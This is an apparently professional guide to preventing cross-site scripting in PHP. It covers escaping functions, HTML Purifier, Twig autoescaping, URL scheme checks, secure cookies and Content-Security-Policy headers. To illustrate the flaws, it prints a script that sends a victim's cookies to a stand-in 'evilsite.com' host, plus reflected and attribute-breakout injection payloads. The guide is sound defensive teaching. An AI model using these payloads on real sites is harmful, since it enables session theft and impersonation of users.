Everything You Need to Know About Preventing Cross-Site Scripting Vulnerabilities in PHP

Cross-Site Scripting (abbreviated as XSS) is a class of security vulnerability whereby an attacker manages to use a website to deliver a potentially malicious JavaScript payload to an end user.

XSS vulnerabilities are very common in web applications. They're a special case of code injection attack; but where SQL injection, local/remote file inclusion, and OS command injection target the server, XSS exclusively targets the users of a website.

There are two main varieties of XSS vulnerabilities we need to consider when planning our defenses:

Stored XSS occurs when data you submit to a website is persisted (on disk or in RAM) across requests, usually with the goal of executing when a privileged user accesses a particular web page.

Reflective XSS occurs when a particular page can be used to execute arbitrary code, but it does not persist the attack code across multiple requests. Since an attacker needs to send a user to a specially crafted URL for the code to run, reflective XSS usually requires some social engineering to pull off.

Cross-Site Scripting vulnerabilities can be used by an attacker to accomplish a long list of potential nefarious goals, including:

Steal your session identifier so they can impersonate you and access the web application.

Redirect you to a phishing page that gathers sensitive information.

Install malware on your computer (usually requires a 0day vulnerability for your browser and OS).

Perform tasks on your behalf (e.g. create a new administrator account with the attacker's credentials).

Cross-Site Scripting represents an asymmetry in the security landscape: XSS vulnerabilities are incredibly easy for attackers to exploit, but XSS mitigation can become a rabbit hole of complexity depending on your project's requirements.

Brief XSS Mitigation Guide

1. If your framework has a templating engine that offers automatic contextual filtering, use that. Make sure you use the appropriate context flags (e.g. url, html_attr, html). Context matters to XSS prevention.

2. echo htmlentities($string, ENT_QUOTES | ENT_HTML5, 'UTF-8'); is a safe and effective way to stop XSS attacks in HTML text and quoted attribute values on a UTF-8 encoded web page, but doesn't allow any HTML.

3. If your requirements allow you to use e.g. Markdown instead of HTML, then don't use HTML.

4. If you need to allow some HTML and aren't using a templating engine (see #1), use HTML Purifier.

5. For user-provided URLs, you additionally want to only allow http: and https: schemes; never javascript:. Furthermore, URL-encode any user input.

The rest of this document explains cross-site scripting vulnerabilities and their mitigation strategies in detail.

What Does an XSS Vulnerability Look Like?

XSS vulnerabilities can occur in any place where information which can be altered by any user is included in the output of a webpage without being properly escaped.

Example 1

<div id="profile"><?php echo $user['profile']; ?></div>

This is a potential stored XSS infection point (assuming the profile field was pulled straight from the database without escaping). If the malicious user is able to include a snippet that looks like this, they can exploit any authenticated user that visits their profile and steal their cookies for future impersonation efforts:

<script> window.open("http://evilsite.com/cookie_stealer.php?cookie=" + document.cookie, "_blank"); </script>

Example 2

<form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">

The above snippet is vulnerable to reflective XSS attacks, because $_SERVER['PHP_SELF'] includes any extra path information appended after the script name. Just trick a user into visiting /form.php/%22%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E and they will see an alert box pop up containing the message 'XSS' when your page loads:

<form action="/form.php/"><script>alert('XSS')</script>" method="post">
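One way to close this hole is to escape the value for an HTML attribute before echoing it. The sketch below uses PHP's built-in htmlspecialchars() with the ENT_QUOTES | ENT_HTML5 flags discussed later in this article; formOpenTag() is a hypothetical helper name, and the payload string simply stands in for a tampered $_SERVER['PHP_SELF'].

```php
<?php
/**
 * Hypothetical helper: build the opening <form> tag with the action URL
 * escaped for use inside a double-quoted HTML attribute.
 */
function formOpenTag(string $action): string
{
    // ENT_QUOTES escapes both " and ', so the value cannot end the attribute.
    $safe = htmlspecialchars($action, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<form action="' . $safe . '" method="post">';
}

// In a real page this argument would be $_SERVER['PHP_SELF'].
$tampered = '/form.php/"><script>alert(\'XSS\')</script>';
echo formOpenTag($tampered), PHP_EOL;
// <form action="/form.php/&quot;&gt;&lt;script&gt;alert(&apos;XSS&apos;)&lt;/script&gt;" method="post">
```

The injected markup now arrives in the browser as inert text inside the attribute value instead of as a new element.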

Unlike SQL Injection, which prepared statements defeat 100% of the time, cross-site scripting doesn't have an industry standard strategy for separating data from instructions. You have to escape special characters to prevent attacks.

The Quick and Dirty XSS Mitigation Technique for PHP Applications

The simplest and most effective way to prevent XSS attacks is the nuclear option: Ruthlessly escape any character that can affect the structure of your document.

For best results, you want to use the built-in htmlentities() function that PHP offers instead of playing with string escaping yourself.

<?php
/**
 * Escape all HTML, JavaScript, and CSS
 *
 * @param string $input The input string
 * @param string $encoding Which character encoding are we using?
 * @return string
 */
function noHTML($input, $encoding = 'UTF-8')
{
    return htmlentities($input, ENT_QUOTES | ENT_HTML5, $encoding);
}

echo '<h2 title="', noHTML($title), '">', noHTML($articleTitle), '</h2>', "\n";
echo noHTML($some_data), "\n";

The security of this construction depends on the presence of the ENT_QUOTES flag when escaping HTML attribute values. Note that this also prevents any HTML in $some_data from being rendered as markup: the characters appear on the page as literal text.

Why ENT_QUOTES | ENT_HTML5 and 'UTF-8'?

We specify ENT_QUOTES to tell htmlentities() to escape quote characters (" and '). This is helpful for situations such as:

<input type="text" name="field" value="<?php echo $escaped_value; ?>" />

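If quote characters went unescaped, an attacker would simply need to pass " autofocus onfocus="malicious javascript code as a value to that form field and presto, instant client-side code execution. Without ENT_QUOTES you can't count on both kinds of quote being escaped: before PHP 8.1, the default flags were ENT_COMPAT | ENT_HTML401, which escapes double quotes but leaves single quotes alone, so any attribute delimited with single quotes stays exploitable.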
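To see the difference concretely, here is a small comparison of ENT_COMPAT (double quotes only) and ENT_QUOTES against a payload aimed at a single-quoted attribute. It uses htmlspecialchars(), which treats quotes exactly like htmlentities() but leaves other characters alone, so the output stays readable; the payload string is illustrative.

```php
<?php
// Illustrative payload aimed at an attribute delimited by single quotes.
$payload = "' autofocus onfocus='alert(1)";

// ENT_COMPAT escapes double quotes only, so the single quotes survive.
$compat = htmlspecialchars($payload, ENT_COMPAT | ENT_HTML5, 'UTF-8');

// ENT_QUOTES escapes both kinds of quote.
$quotes = htmlspecialchars($payload, ENT_QUOTES | ENT_HTML5, 'UTF-8');

echo "<input type='text' name='field' value='", $compat, "' />", PHP_EOL;
// <input type='text' name='field' value='' autofocus onfocus='alert(1)' />

echo "<input type='text' name='field' value='", $quotes, "' />", PHP_EOL;
// <input type='text' name='field' value='&apos; autofocus onfocus=&apos;alert(1)' />
```

In the first line the payload closes the value attribute and adds an event handler; in the second it stays inside the value.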

We specify ENT_HTML5 and 'UTF-8' so htmlentities() knows what character set and version of the HTML standard to work with.

We need to specify both values because, as has been demonstrated against mysql_real_escape_string(), an incorrect (especially attacker-controlled) character encoding can defeat string-based escaping strategies.

For the sake of safety and consistency, the encoding we specify here, the encoding sent in the charset attribute of the <meta> tag, and the charset added to the Content-Type HTTP header should all match.
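A minimal sketch of keeping the three in sync, assuming a single APP_CHARSET constant (a hypothetical name) that the header, the meta tag, and every escaping call all read from:

```php
<?php
// Hypothetical single source of truth for the page's character encoding.
const APP_CHARSET = 'UTF-8';

// 1. Content-Type HTTP header (must be sent before any output).
if (!headers_sent()) {
    header('Content-Type: text/html; charset=' . APP_CHARSET);
}

// 2. <meta> tag inside <head>.
echo '<meta charset="', APP_CHARSET, '">', PHP_EOL;

// 3. Every escaping call passes the same encoding.
$title = 'Tom & "Jerry"';
echo '<h1>', htmlentities($title, ENT_QUOTES | ENT_HTML5, APP_CHARSET), '</h1>', PHP_EOL;
```

Changing the encoding later then means editing one constant rather than hunting for mismatched literals.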

Important - Avoid Premature Optimization

Always escape data on output (when displaying to a user).

Do not escape user input against XSS attacks before inserting into a database. WordPress made this mistake and eventually security researcher Jouko Pynnönen of Klikki Oy realized MySQL column truncation can defeat before-insert XSS prevention strategies.

You should still be validating your input, however. If you're expecting an email address, make sure it's formatted like one.

$email = filter_var($_POST['email'], FILTER_VALIDATE_EMAIL);
if ($email === false) {
    // Not a valid email address! Handle this invalid input here.
}

If you're using MySQL, make sure any values going into a TEXT field fit within 64 KiB (65,535 bytes). When not running in strict SQL mode, MySQL will truncate any value that exceeds that length, which can cause both security issues (as WordPress experienced) and data integrity issues.
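A minimal pre-insert check, assuming the target is a TEXT column (65,535 bytes maximum). strlen() counts bytes rather than characters, which is what matters here because a multi-byte UTF-8 character takes up more than one byte; fitsInMysqlText() is a hypothetical helper name.

```php
<?php
// MySQL TEXT columns hold at most 65,535 bytes (not characters).
const MYSQL_TEXT_MAX_BYTES = 65535;

/**
 * Hypothetical helper: true if $value fits in a TEXT column untruncated.
 * strlen() counts bytes, so multi-byte UTF-8 characters are accounted for.
 */
function fitsInMysqlText(string $value): bool
{
    return strlen($value) <= MYSQL_TEXT_MAX_BYTES;
}

$body = $_POST['body'] ?? '';
if (!is_string($body) || !fitsInMysqlText($body)) {
    // Reject the input instead of letting MySQL truncate it.
    http_response_code(400);
    exit('Comment too long.');
}
```

Rejecting oversized input outright means the stored value is always exactly what the user submitted.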

The "escape all HTML entities" approach is secure and works wonderfully for situations where users should not be providing their own HTML markup. But what if you need to allow some markup without opening the door to arbitrary markup?

Put another way: How can we allow users to provide their own rich text markup without allowing them to execute arbitrary JavaScript in visitors' browsers?

Avoid HTML If You Can

An attractive solution is to adopt a rendering format such as BBCode, Markdown, or reStructuredText instead of allowing raw HTML. This allows us to continue to reject all HTML entities while still allowing a limited subset of markup options to make a user's contributions more expressive and powerful.

If you can avoid accepting raw HTML by using another markup language such as Markdown, please do so. If you can bolt a WYSIWYG editor onto it for non-technical users, even better.

This means doing the following:

1. Escape ALL HTML first, so arbitrary HTML is not passed to the renderer.

2. Render the output of step 1.

For example:

<?php
declare(strict_types=1);

namespace Foo\Bar;

use League\CommonMark\CommonMarkConverter;

class ExampleRenderer
{
    /** @var CommonMarkConverter $markdown */
    protected $markdown;

    public function __construct(CommonMarkConverter $markdown)
    {
        $this->markdown = $markdown;
    }

    /**
     * Escape HTML, then pass to the Markdown renderer.
     *
     * @param string $input
     * @return string
     */
    public function renderUserInput(string $input): string
    {
        // The (string) cast also covers league/commonmark 2.x, where
        // convertToHtml() returns a Stringable object instead of a string.
        return (string) $this->markdown->convertToHtml(self::noHTML($input));
    }

    /**
     * Escape all HTML, JavaScript, and CSS
     *
     * @param string $input The input string
     * @param string $encoding Which character encoding are we using?
     * @return string
     */
    public static function noHTML(string $input, string $encoding = 'UTF-8'): string
    {
        return htmlentities($input, ENT_QUOTES | ENT_HTML5, $encoding);
    }
}
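If you want to see why the order of the two steps matters without installing a Markdown library, here is a deliberately tiny stand-in renderer that only understands **bold**. It is a toy (renderToyMarkup() and escapeHtml() are hypothetical names, and htmlspecialchars() is swapped in for htmlentities() to keep the output readable), not a substitute for a real Markdown parser. It shows that tags typed by the user come out as inert text while the renderer's own tags survive. It does nothing about link URLs, which is one reason rendered output still needs the treatment described in the rest of this article.

```php
<?php
/**
 * Escape every HTML special character, quotes included.
 */
function escapeHtml(string $input): string
{
    return htmlspecialchars($input, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

/**
 * Toy renderer (hypothetical): the only markup it knows is **bold**.
 */
function renderToyMarkup(string $input): string
{
    // Step 1: escape ALL HTML, so user-typed tags become inert text.
    $escaped = escapeHtml($input);

    // Step 2: render; the renderer's own <strong> tags are the only HTML emitted.
    return preg_replace('/\*\*(.+?)\*\*/s', '<strong>$1</strong>', $escaped);
}

echo renderToyMarkup('**hi** <script>alert(1)</script>'), PHP_EOL;
// <strong>hi</strong> &lt;script&gt;alert(1)&lt;/script&gt;
```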

Note, however, that your output will in most cases still be HTML, so don't stop reading here.

An Order of HTML Please, Hold the XSS Payload

Although we can easily stop all XSS attacks by preventing any HTML markup characters from breaking the document structure, this is often not the desired outcome. For some use cases (blog comments, user profiles, etc.) we want to allow our end users to be free to express themselves, within reason. But at the same time, we don't want users to be able to abuse this potential for customization to attack other users.

How can we resolve this conflict? Simple: Use a library such as HTML Purifier. Most of the clever XSS tricks hidden in the HTML specification are easily defeated by HTMLPurifier, if used correctly.

How to Use HTMLPurifier to Stop XSS Attacks

Instead of attempting to naively search and replace malicious snippets in a string of user input, HTML Purifier digests the entire string as an HTML document, breaks it into tokens, and validates all elements and attributes against a whitelist and the RFC definitions for each attribute.

<?php
/**
 * Setup HTML Purifier
 */
require_once '/path/to/HTMLPurifier.auto.php';

$config = HTMLPurifier_Config::createDefault();
$htmlp = new HTMLPurifier($config);
/* etc. */
?>
<!-- etc etc etc. -->
<div id="profile"><?php
    // Use HTML Purifier to prevent XSS in this user's profile
    echo $htmlp->purify($user['profile']);
?></div>

Optimizing HTMLPurifier

Running HTML Purifier on every page load is a performance concern that can be easily fixed by caching. When you insert data into your database, keep the original values intact (e.g. for logging and threat intelligence purposes), but also store a purified version and use the purified HTML when displaying to end users.

This "store, purify, cache, serve from cache" strategy allows you to enjoy the performance benefits developers normally get from filtering on input, but without causing a permanent loss of data. It also allows you to re-purify your original values in the event that you need to (e.g. if HTML Purifier has a bug with HTML5 output and they release a new version that fixes it).

$db->insert('blog_comments', [
    /* Other fields */
    'original_body' => $_POST['body'],
    'rendered_body' => $htmlp->purify($_POST['body'])
]);
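The "keep the original, re-purify later" idea can be sketched without committing to any particular database layer by passing the purifier in as a callable. commentRow() and repurifyRows() are hypothetical helpers; with HTML Purifier the callable would be [$htmlp, 'purify'].

```php
<?php
/**
 * Hypothetical helper: build the row to insert, keeping the raw input
 * alongside its purified rendering.
 */
function commentRow(string $body, callable $purify): array
{
    return [
        'original_body' => $body,          // untouched, for logs and re-purifying later
        'rendered_body' => $purify($body), // what gets served to visitors
    ];
}

/**
 * Hypothetical helper: regenerate rendered_body for every row (e.g. after
 * upgrading HTML Purifier). Only original_body is used as the source.
 */
function repurifyRows(array $rows, callable $purify): array
{
    foreach ($rows as $i => $row) {
        $rows[$i]['rendered_body'] = $purify($row['original_body']);
    }
    return $rows;
}
```

Because rendered_body is always derived from original_body, a purifier bug fix can be rolled out to old content just by re-running repurifyRows() over the stored rows.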

Important: When Not to Use HTML Purifier

HTML Purifier expects to operate in the context of an HTML document, not a string within an HTML attribute. The library isn't psychic: it cannot tell what the rest of the web page is doing immediately before and after the untrusted string you invoke it on.

For example, even though it's using HTML Purifier, the following snippet is still insecure:

<input type="text" name="username" value="<?php echo $htmlp->purify($_GET['username']); ?>" />

Simply pass the string " autofocus onfocus="alert('XSS'); to username and you have client-side code execution.

When inserting any variables into another context, you should also run them through htmlspecialchars() (or noHTML() above) to ensure they don't break out and add extra attributes to the parent element.

This is safe:

<input type="text" name="username" value="<?php echo noHTML($htmlp->purify($_GET['username'])); ?>" />

This, too, is safe against XSS attacks, but still a bad idea:

<?php echo $htmlp->purify("<input type=\"text\" name=\"username\" value=\"".$_GET['username']."\" />"); ?>

As it turns out, context matters a lot for preventing cross-site scripting attacks. What's secure in one context (e.g. HTML is allowed) could be disastrous in other contexts (e.g. we're in the middle of an HTML attribute).

What About Other Contexts?

We've uncovered two rules for preventing XSS attacks so far:

1. Always escape all HTML entities (e.g. with noHTML() defined above) when inserting data into an HTML attribute.

2. Always purify (e.g. with HTML Purifier) when you wish to allow safe HTML from the input string to appear in the rendered web page.

What do we do if we want to add a user-provided parameter to a style tag or attribute? What if we want to define a default value for a JavaScript variable? What about hyperlinks?

Context-Sensitive HTML Escaping in Template Engines

Every context within an HTML document requires distinct escaping rules that are not always relevant to other contexts. Fortunately, there's an easy way to tackle all this complexity without a great deal of effort or research: Use templating libraries.

A popular PHP templating engine, Twig, makes contextual XSS filtering a walk in the park:

{% autoescape 'css' %}
    <p style="color: {{ color|default('#0f0') }};">Test</p>
{% endautoescape %}

{% autoescape 'html' %}
    {{ some_var }}
    {{ not_user_provided|raw }}
    <p class="{{ class|e('html_attr') }}">
        <a href="/user/{{ username|e('url') }}">{{ username }}</a>
    </p>
{% endautoescape %}

If you're using Twig, you should prefer wrapping entire sections in {% autoescape %} blocks over applying |e filters to every printed template variable. Not only does auto-escaping make your code easier to read, but it prevents a single oversight from becoming an entry point for an attacker with a malicious payload.

What If I Cannot Use a Templating Engine?

Then you're doomed to reinvent the wheel, possibly insecurely.

Strip HTML wherever you don't absolutely need to allow it.

Use something like HTML Purifier to prevent XSS when rich content is required, even if there's an intermediary step (e.g. a Markdown renderer) in between.
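For the JavaScript-variable and style-attribute contexts raised earlier, here is a sketch of what reinventing the wheel can look like with PHP built-ins. It assumes JSON encoding with the JSON_HEX_* flags for values placed inside an inline script block, and strict whitelisting (only #rgb or #rrggbb hex colors) for CSS rather than escaping; jsValue() and cssColor() are hypothetical helper names, and neither is a general solution for every sub-context.

```php
<?php
/**
 * Hypothetical helper: encode a value as a JavaScript literal for an inline
 * <script> block. The JSON_HEX_* flags rewrite < > & ' " inside strings as
 * \u003C-style escapes, so the result never contains a literal "</script>".
 */
function jsValue($value): string
{
    $json = json_encode($value, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT);
    if ($json === false) {
        throw new InvalidArgumentException('Value cannot be JSON-encoded.');
    }
    return $json;
}

/**
 * Hypothetical helper: allow only #rgb / #rrggbb colors in a style attribute.
 * Anything else is replaced by a known-safe default rather than escaped.
 */
function cssColor(string $color, string $default = '#00ff00'): string
{
    return preg_match('/\A#(?:[0-9a-fA-F]{3}){1,2}\z/', $color) === 1 ? $color : $default;
}

// Attacker-controlled values (illustrative).
$username = '</script><script>alert(1)</script>';
$color = 'red;background:url(x)';

echo '<script>var username = ', jsValue($username), ';</script>', PHP_EOL;
echo '<p style="color: ', cssColor($color), ';">Test</p>', PHP_EOL;
```

Whitelisting is used for CSS because the set of legitimate values is small and easy to describe, whereas correctly escaping arbitrary CSS is much harder to get right.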

Safely Handling Hyperlinks Without a Templating Engine

If you need to accept arbitrary URLs from your users, and you aren't using a templating engine that supports context-aware URL escaping, apply the following rules:

1. Only allow https: URI schemes. Possibly http:. Never javascript:.

2. URL-encode any user input before escaping HTML.

For example:

<?php
declare(strict_types=1);

namespace Foo\Bar;

class UserProvidedLinks
{
    /** @var array $allowedSchemes */
    protected $allowedSchemes = [];

    public function __construct(array $allowedSchemes = ['https'])
    {
        $this->allowedSchemes = $allowedSchemes;
    }

    /**
     * Only allow valid schemes
     *
     * @param string $url
     * @return string
     */
    public function validateUrl(string $url): string
    {
        $parsed = parse_url($url);
        if (!\is_array($parsed) || !isset($parsed['scheme'])) {
            // Unparseable, or no scheme at all
            return '#';
        }
        if (!\in_array(\strtolower($parsed['scheme']), $this->allowedSchemes, true)) {
            return '#';
        }
        return $url;
    }
}

Usage:

<?php
$filter = new Foo\Bar\UserProvidedLinks([
    'http',
    'https'
]);

// Full URL provided by user
echo '<a href="', noHTML(
    $filter->validateUrl($userProvidedLink)
), '">', noHTML($userProvidedLabel), '</a>', PHP_EOL;

// Partial URL provided by user (rawurlencode() encodes spaces as %20,
// which suits a path segment; urlencode() would turn them into "+"):
echo '<a href="https://example.com/page/', noHTML(rawurlencode($page)), '">', noHTML($label), '</a>', PHP_EOL;

Browser-Level XSS Mitigation

There are a number of security features supported by all modern web browsers that significantly reduce the impact of XSS vulnerabilities. Even if you manage to escape every variable you output, it would be a very good idea to use these features. We are going to focus on two: HTTPS-only cookies (that is, HttpOnly cookies that are only transmitted over TLS) and Content-Security-Policy headers.

Secure Cookies

Any time you set a cookie in PHP, you should set both httpOnly and secure to true . (This assumes your website is only accessible over HTTPS, which it should be.)
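Since PHP 7.3, setcookie() accepts an options array, which makes it harder to forget either flag. A minimal sketch; secureCookieOptions() and setSecureCookie() are hypothetical helper names, and the default path of '/' is an assumption.

```php
<?php
/**
 * Hypothetical helper: options for setcookie() (PHP 7.3+ array form)
 * with Secure and HttpOnly always enabled.
 */
function secureCookieOptions(int $lifetime = 0, string $path = '/'): array
{
    return [
        'expires'  => $lifetime > 0 ? time() + $lifetime : 0, // 0 = session cookie
        'path'     => $path,
        'secure'   => true, // only sent over HTTPS
        'httponly' => true, // not readable from document.cookie
    ];
}

function setSecureCookie(string $name, string $value, int $lifetime = 0): bool
{
    // setcookie() fails and returns false if output has already been sent.
    return setcookie($name, $value, secureCookieOptions($lifetime));
}

// Usage (before any output): setSecureCookie('preferences', 'dark-mode', 3600);
```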

Your session cookie, especially, should not be made available to JavaScript. This can be achieved either by adding these lines to php.ini or by setting them manually on every request:

session.cookie_httponly = On
session.cookie_secure = On

Setting the session cookie parameters on every page load:

session_set_cookie_params(
    0,                 // Lifetime -- 0 means erase when browser closes
    '/',               // Which paths are these cookies relevant to?
    '.yourdomain.com', // Only expose this to which domain?
    true,              // Only send over the network when TLS is used
    true               // Don't expose to JavaScript
);
session_start();

Content-Security-Policy headers

Content-Security-Policy headers significantly reduce the risk and impact of XSS attacks in modern browsers by specifying a whitelist in the HTTP response headers which dictates what the HTTP response body can do. They don't protect against an attacker capable of modifying the source files on the server, but most real-world XSS payloads will fail to execute if the policy is configured properly.

An example of a CSP header looks like this:

Content-Security-Policy: script-src 'self' https://ajax.googleapis.com https://www.google-analytics.com; child-src 'none'; object-src 'none'; upgrade-insecure-requests
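Sending such a header from PHP is a single header() call. The sketch below builds the value from an array and adds a per-response nonce so that your own inline scripts can still run; buildCspHeader() is a hypothetical helper, and the directive list simply mirrors the example header above.

```php
<?php
/**
 * Hypothetical helper: turn ['directive' => [sources...]] into a CSP value.
 * A directive with no sources (e.g. upgrade-insecure-requests) is emitted bare.
 */
function buildCspHeader(array $directives): string
{
    $parts = [];
    foreach ($directives as $directive => $sources) {
        $parts[] = trim($directive . ' ' . implode(' ', $sources));
    }
    return implode('; ', $parts);
}

// Fresh, unguessable nonce for this response only.
$nonce = base64_encode(random_bytes(16));

$csp = buildCspHeader([
    'script-src' => ["'self'", "'nonce-{$nonce}'", 'https://ajax.googleapis.com', 'https://www.google-analytics.com'],
    'child-src'  => ["'none'"],
    'object-src' => ["'none'"],
    'upgrade-insecure-requests' => [],
]);

if (!headers_sent()) {
    header('Content-Security-Policy: ' . $csp);
}

// Inline scripts only run if they carry the matching nonce attribute.
echo '<script nonce="', $nonce, '">console.log("allowed");</script>', PHP_EOL;
```

An injected inline script has no way of knowing the nonce for the current response, so the browser refuses to run it.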

HTML5 Rocks has a great introductory tutorial for Content-Security-Policy headers if you would like to learn more about writing them.

Paragon Initiative Enterprise's CSP Compiler

Ever wanted to make Content-Security-Policy headers easier to manage? Whether you'd rather just edit a JSON file than remember the syntax of a CSP header, or if you'd rather build the headers for a particular request programmatically (e.g. to use the script-nonce feature), check out our MIT-licensed CSP Builder project.

Summary

Use Content-Security-Policy headers and HTTPS-only cookies.

Your first line of defense against XSS attacks should be filtering any tainted information before inserting it into the DOM, not before storing it in a database.

If you can avoid accepting actual HTML by opting for Markdown, etc., then don't accept HTML.

If you're using a templating engine such as Twig, use {% autoescape %} directives and |e filters where appropriate. {% autoescape %} should be prioritized over escaping every variable.

If you're not using a templating engine and need to safely render user-provided HTML, use HTML Purifier. Feel free to leverage caching for optimization, but keep an intact copy on hand.

Otherwise, use noHTML() and leave nothing to chance.

For hyperlinks: Don't allow javascript: URIs, full stop. Consider whitelisting https:. URL-encode all user input.


We Consult

We are a team of technology consultants, web developers, code reviewers, and application security specialists based in Orlando, FL. If you're concerned about the risk of cross-site scripting in your business applications, get in touch with us today.